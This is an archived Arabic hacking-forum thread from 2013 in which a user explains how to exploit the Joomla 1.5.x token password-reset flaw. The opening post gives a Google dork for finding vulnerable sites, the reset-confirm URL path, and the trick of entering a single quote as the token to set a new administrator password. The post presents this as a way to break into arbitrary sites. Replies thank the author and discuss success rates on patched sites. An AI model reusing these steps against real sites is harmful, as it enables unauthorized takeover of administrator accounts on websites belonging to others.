المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : استغلال ثغرة سكربت جومله ===****** Joomla



ahmedfreed
03-23-2013, 03:15 AM
اقدم لكم وبين ايديكم شرح استغلال ثغره سكربت جومله
****** Joomla===========


Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

الأصدارات المصابة 1.5.x


نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن


هسه ندخل على التطبيق ولبحث

الدورك البحث
تدخل تفتح الكوكل صديقنا Google

وتكدب هاذا الكود الي هوه الدورك

كود PHP:
inurl:index.php?option=com_use
طلعتنه هوايه مواقع مصابه
تختار احد من هن

هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب


ندخل للموقع المصاب ونضيف هاذا المسار

كود PHP:
index.php?option=com_user&view=reset&layout=confirm
يصير هيجي يعني

كود PHP:
www.XXXXXX.com/index.php?option=com_user&view=reset&layout=confirm
راح يطلع مربع اسمة "token

نخلي بل مربع هاذي العلامه النقطه

'

هسه راج يطلب منك باسورد جديد

تكتب الباسورد الي تريده

وتعيد كتابته مره لخ

ومبرووك الاختراقق

خوما صعبه ااذا صعبه كلولي

نلقاكم بدرس اخررر

shhaby
03-23-2013, 03:23 AM
بارك الله فيك يا مبدع . بالتوفيق

ahmedfreed
03-23-2013, 03:24 AM
مشكور حبي عالمرور

Saad.Nabir111
03-23-2013, 04:27 AM
يسلمووو
http://www.freeimagehost.info/files/img/display/imagedisplay_acug8n67ljk.gif.php

ahmedfreed
03-23-2013, 03:30 PM
مشكور اخوان على الردود

aymen cyril kamar
03-26-2013, 10:25 PM
مشكور حبيبي بس شغلة لما تحط ' تضغط على submit ???

hackerpk
03-27-2013, 03:39 AM
بارك الله فيك

AHMED.MaDo1995
03-27-2013, 03:52 AM
جربتها اخى ولكن ما ظبطت معى على اكثر من موقع ويقول لى ان الرمز التأكيدى خطأ ولدى سؤال هل فى خانة اليوزر اكتب admin ‎‏ ولا اتركها فارغة وهل اكتب فى token‏ هذه النقطة . ام هذه ' وياريت يا اخى تقولى ليه مش عايزه تظبط معى وايه الاخطاء المحتملة؟

dark prince
03-27-2013, 11:14 PM
مكشور حبيب اخي
بس الثغرة نسب النجاح فيا شوية ضئيلة

ahmedfreed
03-27-2013, 11:16 PM
اه بالنسبه لها قليله وكثير مواقع رقعتها ولكن في كم موقع عالعموم تضعون في الخانة ' اذا منجحت مرقعه

xbey
03-27-2013, 11:56 PM
يسلموا على الطرح

zaki009
03-28-2013, 10:24 PM
مشكووووور اخي